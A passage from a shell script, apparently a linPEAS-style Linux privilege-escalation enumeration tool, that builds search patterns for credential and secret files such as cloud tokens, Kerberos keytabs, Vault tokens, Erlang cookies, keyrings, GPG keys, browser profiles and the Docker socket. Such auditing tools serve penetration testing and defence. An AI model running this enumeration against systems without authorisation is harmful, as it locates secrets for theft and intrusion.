"$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/private|^/tmp" | grep -E "agent.*$" | sort | uniq | head -n 70) + PSTORAGE_SSH_CONFIG=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/usr|^$GREPHOMESEARCH" | grep -E "ssh.*config$" | sort | uniq | head -n 70) + PSTORAGE_CLOUD_CREDENTIALS=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "credentials$|credentials\.db$|legacy_credentials\.db$|access_tokens\.db$|access_tokens\.json$|accessTokens\.json$|azureProfile\.json$|TokenCache\.dat$|AzureRMContext\.json$|\.bluemix$" | sort | uniq | head -n 70) + PSTORAGE_KERBEROS=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "krb5\.conf$|krb5\.keytab$|\.k5login$|kadm5\.acl$|secrets\.ldb$|\.secrets\.mkey$|sssd\.conf$" | sort | uniq | head -n 70) + PSTORAGE_KIBANA=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "kibana\.y.*ml$" | sort | uniq | head -n 70) + PSTORAGE_KNOCKD=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E '/etc/init.d/' | grep -E "^/etc" | grep -E ".*knockd.*$" | sort | uniq | head -n 70) + PSTORAGE_LOGSTASH=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "logstash$" | sort | uniq | head -n 70) + PSTORAGE_ELASTICSEARCH=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "elasticsearch\.y.*ml$" | sort | uniq | head -n 70) + PSTORAGE_VAULT_SSH_HELPER=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "vault-ssh-helper\.hcl$" | sort | uniq | head -n 70) + PSTORAGE_VAULT_SSH_TOKEN=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.vault-token$" | sort | uniq | head -n 70) + PSTORAGE_COUCHDB=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "couchdb$" | sort | uniq | head -n 70) + PSTORAGE_REDIS=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "redis\.conf$" | sort | uniq | head -n 70) + PSTORAGE_MOSQUITTO=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "mosquitto\.conf$" | sort | uniq | head -n 70) + PSTORAGE_NEO4J=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "neo4j$" | sort | uniq | head -n 70) + PSTORAGE_CLOUD_INIT=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "cloud\.cfg$" | sort | uniq | head -n 70) + PSTORAGE_ERLANG=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.erlang\.cookie$" | sort | uniq | head -n 70) + PSTORAGE_GMV_AUTH=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "gvm-tools\.conf$" | sort | uniq | head -n 70) + PSTORAGE_IPSEC=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "ipsec\.secrets$|ipsec\.conf$" | sort | uniq | head -n 70) + PSTORAGE_IRSSI=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.irssi$" | sort | uniq | head -n 70) + PSTORAGE_KEYRING=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "keyrings$|.*\.keyring$|.*\.keystore$|.*\.jks$" | sort | uniq | head -n 70) + PSTORAGE_FILEZILLA=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "filezilla$|filezilla\.xml$|recentservers\.xml$" | sort | uniq | head -n 70) + PSTORAGE_BACKUP_MANAGER=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "storage\.php$|database\.php$" | sort | uniq | head -n 70) + PSTORAGE_SPLUNK=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "passwd$" | sort | uniq | head -n 70) + PSTORAGE_GITLAB=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -v -E '/lib' | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "secrets\.yml$|gitlab\.yml$|gitlab\.rm$" | sort | uniq | head -n 70) + PSTORAGE_PGP_GPG=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -v -E 'README.gnupg' | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E ".*\.pgp$|.*\.gpg$|.*\.gnupg$" | sort | uniq | head -n 70) + PSTORAGE_CACHE_VI=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E ".*\.swp$|.*\.viminfo$" | sort | uniq | head -n 70) + PSTORAGE_DOCKER=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "docker\.socket$|docker\.sock$|Dockerfile$|docker-compose\.yml$" | sort | uniq | head -n 70) + PSTORAGE_FIREFOX=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^" | grep -E "\.mozilla$|Firefox$" | sort | uniq | head -n 70) + PSTORAGE_CHROME=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^" | grep -E "google-chrome$|Chrome$" | sort | uniq | head -n 70) + PSTORAGE_OPERA=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^" | grep -E "com\.operasoftware\.Opera$" | sort | uniq | head -n 70) + PSTORAGE_SAFARI=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^" | grep -E "Safari$" | sort | uniq | head -n 70) + PSTORAGE_AUTOLOGIN=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "autologin$|autologin\.conf$" | sort | uniq | head -n 70) + PSTORAGE_FASTCGI=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "fastcgi_params$" | sort | uniq | head -n 70) + PSTORAGE_SNMP=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "snmpd\.conf$" | sort | uniq | head -n 70) + PSTORAGE_PYPIRC=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.pypirc$" | sort | uniq | head -n 70) + PSTORAGE_POSTFIX=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "postfix$" | sort | 